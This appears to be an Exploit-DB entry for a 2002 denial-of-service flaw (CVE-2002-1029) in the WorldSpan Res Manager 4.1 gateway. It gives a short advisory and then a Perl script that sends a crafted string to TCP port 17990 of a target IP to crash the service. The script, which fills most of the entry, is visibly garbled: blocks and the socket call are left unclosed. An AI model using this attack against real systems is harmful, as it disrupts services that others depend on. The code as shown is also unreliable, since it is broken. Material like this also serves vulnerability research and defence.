WorldSpan Res Manager 4.1 Malformed TCP Packet Denial of Service Vulnerability

ID EDB-ID:21594
Type exploitdb
Reporter altomo
Modified 2002-07-04T00:00:00


WorldSpan Res Manager 4.1 Malformed TCP Packet Denial Of Service Vulnerability. CVE-2002-1029 . Dos exploit for windows platform


It has been reported that WorldSpan Res Manager 4.1 for Microsoft Windows is vulnerable to a denial of service condition.

Res Manager systems are connected to Worldspan via private lines or through the Internet. Before accessing Worldspan, clients must first go through a local gateway, which accepts connections from Res Manager clients via TCP port 17990. If a malformed packet is sent to this port, the gateway software attempts to process the packet and eventually crashes.

#Worldspan Gateway DoS

$sabre = "worldspanshouldgoboom";

use IO::Socket;
$ip = "$ARGV[0]";
$port = "17990";
if ($#ARGV<0) {
print " useage: $0 <ip>\n";
$socket = IO::Socket::INET->new(

print "Worldspan Gateway DoS\n";
print "altomo\\n";

print "Wait about a minute, and it should crash.\n";
print $socket "$sabre\r";
close $socket;